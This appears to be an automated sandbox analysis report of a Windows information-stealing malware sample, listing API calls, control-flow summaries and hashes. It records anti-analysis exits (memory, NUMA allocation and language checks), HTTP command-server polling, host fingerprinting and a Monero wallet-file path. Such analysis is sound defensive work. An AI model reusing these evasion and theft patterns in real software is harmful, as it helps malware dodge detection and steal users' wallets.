                                • GetProcAddress.KERNEL32(75550000,008FCA68), ref: 00E29EBE
                                • GetProcAddress.KERNEL32(75550000,008FCA80), ref: 00E29ED6
                                • GetProcAddress.KERNEL32(75550000,008FC888), ref: 00E29EEF
                                • GetProcAddress.KERNEL32(75550000,008FCAB0), ref: 00E29F07
                                • GetProcAddress.KERNEL32(75550000,008FCAF8), ref: 00E29F1F
                                • GetProcAddress.KERNEL32(75550000,008FC810), ref: 00E29F38
                                • GetProcAddress.KERNEL32(75550000,008F9FC8), ref: 00E29F50
                                • GetProcAddress.KERNEL32(75550000,008FC8A0), ref: 00E29F68
                                • GetProcAddress.KERNEL32(75550000,008FC8B8), ref: 00E29F81
                                • GetProcAddress.KERNEL32(75550000,008E69C0), ref: 00E29F99
                                • GetProcAddress.KERNEL32(75550000,008FC8E8), ref: 00E29FB1
                                • GetProcAddress.KERNEL32(75550000,008E69E0), ref: 00E29FCA
                                • GetProcAddress.KERNEL32(75550000,008FC900), ref: 00E29FE2
                                • GetProcAddress.KERNEL32(75550000,008FC918), ref: 00E29FFA
                                • GetProcAddress.KERNEL32(75550000,008E6420), ref: 00E2A013
                                • GetProcAddress.KERNEL32(75550000,008E6620), ref: 00E2A02B
                                • LoadLibraryA.KERNEL32(008FC930,?,00E25CA3,00E30AEB,?,?,?,?,?,?,?,?,?,?,00E30AEA,00E30AE3), ref: 00E2A03D
                                • LoadLibraryA.KERNEL32(008FC948,?,00E25CA3,00E30AEB,?,?,?,?,?,?,?,?,?,?,00E30AEA,00E30AE3), ref: 00E2A04E
                                • LoadLibraryA.KERNEL32(008FC960,?,00E25CA3,00E30AEB,?,?,?,?,?,?,?,?,?,?,00E30AEA,00E30AE3), ref: 00E2A060
                                • LoadLibraryA.KERNEL32(008FC978,?,00E25CA3,00E30AEB,?,?,?,?,?,?,?,?,?,?,00E30AEA,00E30AE3), ref: 00E2A072
                                • LoadLibraryA.KERNEL32(008FC990,?,00E25CA3,00E30AEB,?,?,?,?,?,?,?,?,?,?,00E30AEA,00E30AE3), ref: 00E2A083
                                • LoadLibraryA.KERNEL32(008FC9A8,?,00E25CA3,00E30AEB,?,?,?,?,?,?,?,?,?,?,00E30AEA,00E30AE3), ref: 00E2A095
                                • LoadLibraryA.KERNEL32(008FCC30,?,00E25CA3,00E30AEB,?,?,?,?,?,?,?,?,?,?,00E30AEA,00E30AE3), ref: 00E2A0A7
                                • LoadLibraryA.KERNEL32(008FCD98,?,00E25CA3,00E30AEB,?,?,?,?,?,?,?,?,?,?,00E30AEA,00E30AE3), ref: 00E2A0B8
                                • GetProcAddress.KERNEL32(75750000,008E6500), ref: 00E2A0DA
                                • GetProcAddress.KERNEL32(75750000,008FCB28), ref: 00E2A0F2
                                • GetProcAddress.KERNEL32(75750000,008F8900), ref: 00E2A10A
                                • GetProcAddress.KERNEL32(75750000,008FCB70), ref: 00E2A123
                                • GetProcAddress.KERNEL32(75750000,008E65A0), ref: 00E2A13B
                                • GetProcAddress.KERNEL32(73CC0000,008EB090), ref: 00E2A160
                                • GetProcAddress.KERNEL32(73CC0000,008E6360), ref: 00E2A179
                                • GetProcAddress.KERNEL32(73CC0000,008EAF50), ref: 00E2A191
                                • GetProcAddress.KERNEL32(73CC0000,008FCBB8), ref: 00E2A1A9
                                • GetProcAddress.KERNEL32(73CC0000,008FCDB0), ref: 00E2A1C2
                                • GetProcAddress.KERNEL32(73CC0000,008E63C0), ref: 00E2A1DA
                                • GetProcAddress.KERNEL32(73CC0000,008E63E0), ref: 00E2A1F2
                                • GetProcAddress.KERNEL32(73CC0000,008FCBD0), ref: 00E2A20B
                                • GetProcAddress.KERNEL32(757E0000,008E6640), ref: 00E2A22C
                                • GetProcAddress.KERNEL32(757E0000,008E6560), ref: 00E2A244
                                • GetProcAddress.KERNEL32(757E0000,008FCB88), ref: 00E2A25D
                                • GetProcAddress.KERNEL32(757E0000,008FCDC8), ref: 00E2A275
                                • GetProcAddress.KERNEL32(757E0000,008E6400), ref: 00E2A28D
                                • GetProcAddress.KERNEL32(758D0000,008EB180), ref: 00E2A2B3
                                • GetProcAddress.KERNEL32(758D0000,008EB1A8), ref: 00E2A2CB
                                • GetProcAddress.KERNEL32(758D0000,008FCD08), ref: 00E2A2E3
                                • GetProcAddress.KERNEL32(758D0000,008E6440), ref: 00E2A2FC
                                • GetProcAddress.KERNEL32(758D0000,008E6480), ref: 00E2A314
                                • GetProcAddress.KERNEL32(758D0000,008EAF78), ref: 00E2A32C
                                • GetProcAddress.KERNEL32(76BE0000,008FCB58), ref: 00E2A352
                                • GetProcAddress.KERNEL32(76BE0000,008E65E0), ref: 00E2A36A
                                • GetProcAddress.KERNEL32(76BE0000,008F8890), ref: 00E2A382
                                • GetProcAddress.KERNEL32(76BE0000,008FCBE8), ref: 00E2A39B
                                • GetProcAddress.KERNEL32(76BE0000,008FCC00), ref: 00E2A3B3
                                • GetProcAddress.KERNEL32(76BE0000,008E6540), ref: 00E2A3CB
                                • GetProcAddress.KERNEL32(76BE0000,008E64A0), ref: 00E2A3E4
                                • GetProcAddress.KERNEL32(76BE0000,008FCB40), ref: 00E2A3FC
                                • GetProcAddress.KERNEL32(76BE0000,008FCCC0), ref: 00E2A414
                                • GetProcAddress.KERNEL32(75670000,008E65C0), ref: 00E2A436
                                • GetProcAddress.KERNEL32(75670000,008FCBA0), ref: 00E2A44E
                                • GetProcAddress.KERNEL32(75670000,008FCDE0), ref: 00E2A466
                                • GetProcAddress.KERNEL32(75670000,008FCC18), ref: 00E2A47F
                                • GetProcAddress.KERNEL32(75670000,008FCD20), ref: 00E2A497
                                • GetProcAddress.KERNEL32(759D0000,008E62C0), ref: 00E2A4B8
                                • GetProcAddress.KERNEL32(759D0000,008E63A0), ref: 00E2A4D1
                                • GetProcAddress.KERNEL32(76D80000,008E64C0), ref: 00E2A4F2
                                • GetProcAddress.KERNEL32(76D80000,008FCC48), ref: 00E2A50A
                                • GetProcAddress.KERNEL32(6F5C0000,008E64E0), ref: 00E2A530
                                • GetProcAddress.KERNEL32(6F5C0000,008E6600), ref: 00E2A548
                                • GetProcAddress.KERNEL32(6F5C0000,008E6340), ref: 00E2A560
                                • GetProcAddress.KERNEL32(6F5C0000,008FCC60), ref: 00E2A579
                                • GetProcAddress.KERNEL32(6F5C0000,008E6320), ref: 00E2A591
                                • GetProcAddress.KERNEL32(6F5C0000,008E6660), ref: 00E2A5A9
                                • GetProcAddress.KERNEL32(6F5C0000,008E6280), ref: 00E2A5C2
                                • GetProcAddress.KERNEL32(6F5C0000,008E6460), ref: 00E2A5DA
                                • GetProcAddress.KERNEL32(6F5C0000,InternetSetOptionA), ref: 00E2A5F1
                                • GetProcAddress.KERNEL32(6F5C0000,HttpQueryInfoA), ref: 00E2A607
                                • GetProcAddress.KERNEL32(75480000,008FCC78), ref: 00E2A629
                                • GetProcAddress.KERNEL32(75480000,008F88A0), ref: 00E2A641
                                • GetProcAddress.KERNEL32(75480000,008FCD38), ref: 00E2A659
                                • GetProcAddress.KERNEL32(75480000,008FCC90), ref: 00E2A672
                                • GetProcAddress.KERNEL32(753B0000,008E62A0), ref: 00E2A693
                                • GetProcAddress.KERNEL32(6D600000,008FCCA8), ref: 00E2A6B4
                                • GetProcAddress.KERNEL32(6D600000,008E6380), ref: 00E2A6CD
                                • GetProcAddress.KERNEL32(6D600000,008FCCD8), ref: 00E2A6E5
                                • GetProcAddress.KERNEL32(6D600000,008FCCF0), ref: 00E2A6FD
                                Strings
                                Yara matches
                                Similarity
                                • API ID: AddressProc$LibraryLoad
                                • String ID: HttpQueryInfoA$InternetSetOptionA
                                • API String ID: 2238633743-1775429166
                                • Opcode ID: d00f571608e1247e4d06da186cb2d565dfc3da348319f04bfd2b1b50d953de0f
                                • Instruction ID: 9591c47fda6a1b5c705f104dd775e0c634245c03084395d307072bb69d03f792
                                • Opcode Fuzzy Hash: d00f571608e1247e4d06da186cb2d565dfc3da348319f04bfd2b1b50d953de0f
                                • Instruction Fuzzy Hash: EA62E8B5710308EFC764DFA8E9989673BF9F78C601714875AA68AC324CD63F9841DB60

                                 Control-flow Graph (rendered graph omitted; function entry block e16280, a WinINet request sequence: InternetOpenA, InternetConnectA, HttpOpenRequestA, HttpSendRequestA, HttpQueryInfoA, InternetReadFile, InternetCloseHandle)
                                APIs
                                  • Part of subcall function 00E2A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00E2A7E6
                                  • Part of subcall function 00E147B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00E14839
                                  • Part of subcall function 00E147B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00E14849
                                  • Part of subcall function 00E2A740: lstrcpy.KERNEL32(00E30E17,00000000), ref: 00E2A788
                                • InternetOpenA.WININET(00E30DFE,00000001,00000000,00000000,00000000), ref: 00E162E1
                                • StrCmpCA.SHLWAPI(?,008FE5C0), ref: 00E16303
                                • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00E16335
                                • HttpOpenRequestA.WININET(00000000,GET,?,008FDC58,00000000,00000000,00400100,00000000), ref: 00E16385
                                • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00E163BF
                                • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00E163D1
                                • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 00E163FD
                                • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00E1646D
                                • InternetCloseHandle.WININET(00000000), ref: 00E164EF
                                • InternetCloseHandle.WININET(00000000), ref: 00E164F9
                                • InternetCloseHandle.WININET(00000000), ref: 00E16503
                                Strings
                                Yara matches
                                Similarity
                                • API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                                • String ID: ERROR$ERROR$GET
                                • API String ID: 3749127164-2509457195
                                • Opcode ID: 81a44bfa8f2a579c110e4dc93865bff4d74c9d770f4fa490656e387a8b0defe7
                                • Instruction ID: 40057ed71b7c90c9e72a025df92635f0bcb26063512fb1a67cb857c40a8a6583
                                • Opcode Fuzzy Hash: 81a44bfa8f2a579c110e4dc93865bff4d74c9d770f4fa490656e387a8b0defe7
                                • Instruction Fuzzy Hash: 63714A71A00318EBDB24DFA0DC59BEEB7B8BB44700F1091A9F50A7B184DBB56A85CF51

                                 Control-flow Graph (rendered graph omitted; function entry block e25510, repeated StrCmpCA checks against "ERROR" with a Sleep-and-retry loop back to block e2557c)
                                APIs
                                  • Part of subcall function 00E2A820: lstrlen.KERNEL32(00E14F05,?,?,00E14F05,00E30DDE), ref: 00E2A82B
                                  • Part of subcall function 00E2A820: lstrcpy.KERNEL32(00E30DDE,00000000), ref: 00E2A885
                                  • Part of subcall function 00E2A740: lstrcpy.KERNEL32(00E30E17,00000000), ref: 00E2A788
                                • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00E25644
                                • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00E256A1
                                • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00E25857
                                  • Part of subcall function 00E2A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00E2A7E6
                                  • Part of subcall function 00E251F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00E25228
                                  • Part of subcall function 00E2A8A0: lstrcpy.KERNEL32(?,00E30E17), ref: 00E2A905
                                  • Part of subcall function 00E252C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00E25318
                                  • Part of subcall function 00E252C0: lstrlen.KERNEL32(00000000), ref: 00E2532F
                                  • Part of subcall function 00E252C0: StrStrA.SHLWAPI(00000000,00000000), ref: 00E25364
                                  • Part of subcall function 00E252C0: lstrlen.KERNEL32(00000000), ref: 00E25383
                                  • Part of subcall function 00E252C0: lstrlen.KERNEL32(00000000), ref: 00E253AE
                                • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00E2578B
                                • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00E25940
                                • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00E25A0C
                                • Sleep.KERNEL32(0000EA60), ref: 00E25A1B
                                Strings
                                Yara matches
                                Similarity
                                • API ID: lstrcpylstrlen$Sleep
                                • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                                • API String ID: 507064821-2791005934
                                • Opcode ID: 5abf67085bfbb398fc31b54cb1622d2059e911ad95d9e3870d40726ef122cea3
                                • Instruction ID: c2dc3817eeb3a9ca3a4449e7b6530e78ca3441811a7dec8780e5435e67e8c708
                                • Opcode Fuzzy Hash: 5abf67085bfbb398fc31b54cb1622d2059e911ad95d9e3870d40726ef122cea3
                                • Instruction Fuzzy Hash: 29E15F729102189BCB1CFBA0FD56AFE73B9AF54300F449168F50677095EF356A09CBA2

                                Control-flow Graph

                                control_flow_graph 1301 e217a0-e217cd call e2aad0 StrCmpCA 1304 e217d7-e217f1 call e2aad0 1301->1304 1305 e217cf-e217d1 ExitProcess 1301->1305 1309 e217f4-e217f8 1304->1309 1310 e219c2-e219cd call e2a800 1309->1310 1311 e217fe-e21811 1309->1311 1313 e21817-e2181a 1311->1313 1314 e2199e-e219bd 1311->1314 1316 e21821-e21830 call e2a820 1313->1316 1317 e21849-e21858 call e2a820 1313->1317 1318 e218cf-e218e0 StrCmpCA 1313->1318 1319 e2198f-e21999 call e2a820 1313->1319 1320 e218ad-e218be StrCmpCA 1313->1320 1321 e21932-e21943 StrCmpCA 1313->1321 1322 e21913-e21924 StrCmpCA 1313->1322 1323 e21970-e21981 StrCmpCA 1313->1323 1324 e218f1-e21902 StrCmpCA 1313->1324 1325 e21951-e21962 StrCmpCA 1313->1325 1326 e21835-e21844 call e2a820 1313->1326 1327 e2187f-e21890 StrCmpCA 1313->1327 1328 e2185d-e2186e StrCmpCA 1313->1328 1314->1309 1316->1314 1317->1314 1336 e218e2-e218e5 1318->1336 1337 e218ec 1318->1337 1319->1314 1334 e218c0-e218c3 1320->1334 1335 e218ca 1320->1335 1342 e21945-e21948 1321->1342 1343 e2194f 1321->1343 1340 e21930 1322->1340 1341 e21926-e21929 1322->1341 1347 e21983-e21986 1323->1347 1348 e2198d 1323->1348 1338 e21904-e21907 1324->1338 1339 e2190e 1324->1339 1344 e21964-e21967 1325->1344 1345 e2196e 1325->1345 1326->1314 1332 e21892-e2189c 1327->1332 1333 e2189e-e218a1 1327->1333 1330 e21870-e21873 1328->1330 1331 e2187a 1328->1331 1330->1331 1331->1314 1352 e218a8 1332->1352 1333->1352 1334->1335 1335->1314 1336->1337 1337->1314 1338->1339 1339->1314 1340->1314 1341->1340 1342->1343 1343->1314 1344->1345 1345->1314 1347->1348 1348->1314 1352->1314
                                APIs
                                • StrCmpCA.SHLWAPI(00000000,block), ref: 00E217C5
                                • ExitProcess.KERNEL32 ref: 00E217D1
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1448998514.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: ExitProcess
                                • String ID: block
                                • API String ID: 621844428-2199623458
                                • Opcode ID: 3cc5efc9a2d205e61a3cbc603bd2fa328bff1cd8df69348a5e29a5e6c90e0bc8
                                • Instruction ID: 929d3a8e9fb180bd35c6e3a2fad974fd48e248c18f3ec112360a9563b62bfcbe
                                • Opcode Fuzzy Hash: 3cc5efc9a2d205e61a3cbc603bd2fa328bff1cd8df69348a5e29a5e6c90e0bc8
                                • Instruction Fuzzy Hash: E05160B4B04219EFCB08DFA0E968ABE77F9BF94704F106098E40677244D775EA81CB61

                                Control-flow Graph

                                control_flow_graph 1356 e27500-e2754a GetWindowsDirectoryA 1357 e27553-e275c7 GetVolumeInformationA call e28d00 * 3 1356->1357 1358 e2754c 1356->1358 1365 e275d8-e275df 1357->1365 1358->1357 1366 e275e1-e275fa call e28d00 1365->1366 1367 e275fc-e27617 GetProcessHeap RtlAllocateHeap 1365->1367 1366->1365 1369 e27628-e27658 wsprintfA call e2a740 1367->1369 1370 e27619-e27626 call e2a740 1367->1370 1377 e2767e-e2768e 1369->1377 1370->1377
                                APIs
                                • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00E27542
                                • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00E2757F
                                • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00E27603
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00E2760A
                                • wsprintfA.USER32 ref: 00E27640
                                  • Part of subcall function 00E2A740: lstrcpy.KERNEL32(00E30E17,00000000), ref: 00E2A788
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1448998514.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                                • String ID: :$C$\$
                                • API String ID: 1544550907-3109660283
                                • Opcode ID: 9fc116894a89d50c68ace7145021b714f000be6c0dd9f3214be409b87a65cb75
                                • Instruction ID: e5e1f9f731eb7ee55a6ef64f6c2a70bb980c5dfa2084f84008ff0395cc49af30
                                • Opcode Fuzzy Hash: 9fc116894a89d50c68ace7145021b714f000be6c0dd9f3214be409b87a65cb75
                                • Instruction Fuzzy Hash: BA417FB1E04358EBDB10DB94EC45BEEBBB8EB08704F101199F64977280DB796A44CBA5

                                Control-flow Graph

                                APIs
                                  • Part of subcall function 00E29860: GetProcAddress.KERNEL32(75550000,008F0780), ref: 00E298A1
                                  • Part of subcall function 00E29860: GetProcAddress.KERNEL32(75550000,008F0798), ref: 00E298BA
                                  • Part of subcall function 00E29860: GetProcAddress.KERNEL32(75550000,008F0660), ref: 00E298D2
                                  • Part of subcall function 00E29860: GetProcAddress.KERNEL32(75550000,008F07B0), ref: 00E298EA
                                  • Part of subcall function 00E29860: GetProcAddress.KERNEL32(75550000,008F05A0), ref: 00E29903
                                  • Part of subcall function 00E29860: GetProcAddress.KERNEL32(75550000,008F89A0), ref: 00E2991B
                                  • Part of subcall function 00E29860: GetProcAddress.KERNEL32(75550000,008E6760), ref: 00E29933
                                  • Part of subcall function 00E29860: GetProcAddress.KERNEL32(75550000,008E67C0), ref: 00E2994C
                                  • Part of subcall function 00E29860: GetProcAddress.KERNEL32(75550000,008F0678), ref: 00E29964
                                  • Part of subcall function 00E29860: GetProcAddress.KERNEL32(75550000,008F07C8), ref: 00E2997C
                                  • Part of subcall function 00E29860: GetProcAddress.KERNEL32(75550000,008F05B8), ref: 00E29995
                                  • Part of subcall function 00E29860: GetProcAddress.KERNEL32(75550000,008F05D0), ref: 00E299AD
                                  • Part of subcall function 00E29860: GetProcAddress.KERNEL32(75550000,008E68A0), ref: 00E299C5
                                  • Part of subcall function 00E29860: GetProcAddress.KERNEL32(75550000,008F05E8), ref: 00E299DE
                                  • Part of subcall function 00E2A740: lstrcpy.KERNEL32(00E30E17,00000000), ref: 00E2A788
                                  • Part of subcall function 00E111D0: ExitProcess.KERNEL32 ref: 00E11211
                                  • Part of subcall function 00E11160: GetSystemInfo.KERNEL32(?), ref: 00E1116A
                                  • Part of subcall function 00E11160: ExitProcess.KERNEL32 ref: 00E1117E
                                  • Part of subcall function 00E11110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00E1112B
                                  • Part of subcall function 00E11110: VirtualAllocExNuma.KERNEL32(00000000), ref: 00E11132
                                  • Part of subcall function 00E11110: ExitProcess.KERNEL32 ref: 00E11143
                                  • Part of subcall function 00E11220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 00E1123E
                                  • Part of subcall function 00E11220: __aulldiv.LIBCMT ref: 00E11258
                                  • Part of subcall function 00E11220: __aulldiv.LIBCMT ref: 00E11266
                                  • Part of subcall function 00E11220: ExitProcess.KERNEL32 ref: 00E11294
                                  • Part of subcall function 00E26770: GetUserDefaultLangID.KERNEL32 ref: 00E26774
                                  • Part of subcall function 00E11190: ExitProcess.KERNEL32 ref: 00E111C6
                                  • Part of subcall function 00E27850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00E111B7), ref: 00E27880
                                  • Part of subcall function 00E27850: RtlAllocateHeap.NTDLL(00000000), ref: 00E27887
                                  • Part of subcall function 00E27850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00E2789F
                                  • Part of subcall function 00E278E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00E27910
                                  • Part of subcall function 00E278E0: RtlAllocateHeap.NTDLL(00000000), ref: 00E27917
                                  • Part of subcall function 00E278E0: GetComputerNameA.KERNEL32(?,00000104), ref: 00E2792F
                                  • Part of subcall function 00E2A9B0: lstrlen.KERNEL32(?,008F8B80,?,\Monero\wallet.keys,00E30E17), ref: 00E2A9C5
                                  • Part of subcall function 00E2A9B0: lstrcpy.KERNEL32(00000000), ref: 00E2AA04
                                  • Part of subcall function 00E2A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00E2AA12
                                  • Part of subcall function 00E2A8A0: lstrcpy.KERNEL32(?,00E30E17), ref: 00E2A905
                                • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,008F89E0,?,00E3110C,?,00000000,?,00E31110,?,00000000,00E30AEF), ref: 00E26ACA
                                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00E26AE8
                                • CloseHandle.KERNEL32(00000000), ref: 00E26AF9
                                • Sleep.KERNEL32(00001770), ref: 00E26B04
                                • CloseHandle.KERNEL32(?,00000000,?,008F89E0,?,00E3110C,?,00000000,?,00E31110,?,00000000,00E30AEF), ref: 00E26B1A
                                • ExitProcess.KERNEL32 ref: 00E26B22
                                Memory Dump Source
                                • Source File: 00000000.00000002.1448998514.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser__aulldiv$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                                • String ID:
                                • API String ID: 2525456742-0
                                • Opcode ID: e46d084a02062b07a4491ea6bfee0fe9bfbf05ba89cecdfadd4dd2c3de1819cf
                                • Instruction ID: 57fa167901faf5f49fb0228ccf649a9a32d87a9f5880d3cf04cb5ddeea0305b2
                                • Opcode Fuzzy Hash: e46d084a02062b07a4491ea6bfee0fe9bfbf05ba89cecdfadd4dd2c3de1819cf
                                • Instruction Fuzzy Hash: 7E310171A00228ABDB18F7F0FC5ABEE77B8AF44340F146628F252B6181DF745945C7A2

                                Control-flow Graph

                                control_flow_graph 1436 e11220-e11247 call e289b0 GlobalMemoryStatusEx 1439 e11273-e1127a 1436->1439 1440 e11249-e11271 call e2da00 * 2 1436->1440 1441 e11281-e11285 1439->1441 1440->1441 1443 e11287 1441->1443 1444 e1129a-e1129d 1441->1444 1446 e11292-e11294 ExitProcess 1443->1446 1447 e11289-e11290 1443->1447 1447->1444 1447->1446
                                APIs
                                • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 00E1123E
                                • __aulldiv.LIBCMT ref: 00E11258
                                • __aulldiv.LIBCMT ref: 00E11266
                                • ExitProcess.KERNEL32 ref: 00E11294
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1448998514.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                                • String ID: @
                                • API String ID: 3404098578-2766056989
                                • Opcode ID: f474c20ab1e3ab6db676f7a4766a4fdfe2081a90873f6532d25a89cb5620f5d1
                                • Instruction ID: b1f3da636a37fc18fa98aa22d069ba6464e183824918d03d42f121bd967140a5
                                • Opcode Fuzzy Hash: f474c20ab1e3ab6db676f7a4766a4fdfe2081a90873f6532d25a89cb5620f5d1
                                • Instruction Fuzzy Hash: 41014BB094431CEAEF10DBE0DC4ABDEBBB8AB14705F209588E706B6280D6B455819799

                                Control-flow Graph

                                control_flow_graph 1450 e26af3 1451 e26b0a 1450->1451 1453 e26aba-e26ad7 call e2aad0 OpenEventA 1451->1453 1454 e26b0c-e26b22 call e26920 call e25b10 CloseHandle ExitProcess 1451->1454 1460 e26af5-e26b04 CloseHandle Sleep 1453->1460 1461 e26ad9-e26af1 call e2aad0 CreateEventA 1453->1461 1460->1451 1461->1454
                                APIs
                                • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,008F89E0,?,00E3110C,?,00000000,?,00E31110,?,00000000,00E30AEF), ref: 00E26ACA
                                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00E26AE8
                                • CloseHandle.KERNEL32(00000000), ref: 00E26AF9
                                • Sleep.KERNEL32(00001770), ref: 00E26B04
                                • CloseHandle.KERNEL32(?,00000000,?,008F89E0,?,00E3110C,?,00000000,?,00E31110,?,00000000,00E30AEF), ref: 00E26B1A
                                • ExitProcess.KERNEL32 ref: 00E26B22
                                Memory Dump Source
                                • Source File: 00000000.00000002.1448998514.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                                • String ID:
                                • API String ID: 941982115-0
                                • Opcode ID: 2a91163542758e6033852dc52ec4360880716c8c16ff381b139dfc9e0da6ca65
                                • Instruction ID: ab95b0cd05c6ae31aaca21c3ceb229852b258fb951ffd5fb6dfb07cd5e12c307
                                • Opcode Fuzzy Hash: 2a91163542758e6033852dc52ec4360880716c8c16ff381b139dfc9e0da6ca65
                                • Instruction Fuzzy Hash: 0EF03A70A40329EFEB20ABA0AC06BBE7B74FF14701F106714B503B2185CBB55540D665

                                Control-flow Graph

                                APIs
                                • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00E14839
                                • InternetCrackUrlA.WININET(00000000,00000000), ref: 00E14849
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1448998514.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: CrackInternetlstrlen
                                • String ID: <
                                • API String ID: 1274457161-4251816714
                                • Opcode ID: dd9ec09cd55093258c8c595979e4d1bcab66a4d8091021d6d5f34836d48999a1
                                • Instruction ID: 7d293f49cd5563b447c68ec19af2eb855460d2baf7aae621fd05b5d21e4780e6
                                • Opcode Fuzzy Hash: dd9ec09cd55093258c8c595979e4d1bcab66a4d8091021d6d5f34836d48999a1
                                • Instruction Fuzzy Hash: 06213EB1D00209ABDF14DFA4E949ADE7B74FF44320F108629F955B7280EB706A05CB91

                                Control-flow Graph

                                APIs
                                  • Part of subcall function 00E2A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00E2A7E6
                                  • Part of subcall function 00E16280: InternetOpenA.WININET(00E30DFE,00000001,00000000,00000000,00000000), ref: 00E162E1
                                  • Part of subcall function 00E16280: StrCmpCA.SHLWAPI(?,008FE5C0), ref: 00E16303
                                  • Part of subcall function 00E16280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00E16335
                                  • Part of subcall function 00E16280: HttpOpenRequestA.WININET(00000000,GET,?,008FDC58,00000000,00000000,00400100,00000000), ref: 00E16385
                                  • Part of subcall function 00E16280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00E163BF
                                  • Part of subcall function 00E16280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00E163D1
                                • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00E25228
                                Memory Dump Source
                                • Source File: 00000000.00000002.1448998514.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                Similarity
                                • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                                • String ID: ERROR$ERROR
                                • API String ID: 3287882509-2579291623
                                • Opcode ID: ccf179b55438e1abe975f9a79b10ad5b9e0d0f5da560bc184a76ce6063cc48f9
                                • Instruction ID: 2f4b570d11141cb3b06f683f45b200a4c6cb35d827e70b36522e5cfb54fca170
                                • Opcode Fuzzy Hash: ccf179b55438e1abe975f9a79b10ad5b9e0d0f5da560bc184a76ce6063cc48f9
                                • Instruction Fuzzy Hash: 9D115271900118ABCB18FF70ED56AED77B8AF50300F445168F90A7B192EF74AB05CB91
                                APIs
                                • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00E1112B
                                • VirtualAllocExNuma.KERNEL32(00000000), ref: 00E11132
                                • ExitProcess.KERNEL32 ref: 00E11143
                                Memory Dump Source
                                • Source File: 00000000.00000002.1448998514.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                Similarity
                                • API ID: Process$AllocCurrentExitNumaVirtual
                                • String ID:
                                • API String ID: 1103761159-0
                                • Opcode ID: 0d5bfa169150748f779b0db5ded73382effa1e5a46a9d92c667138c07ba68596
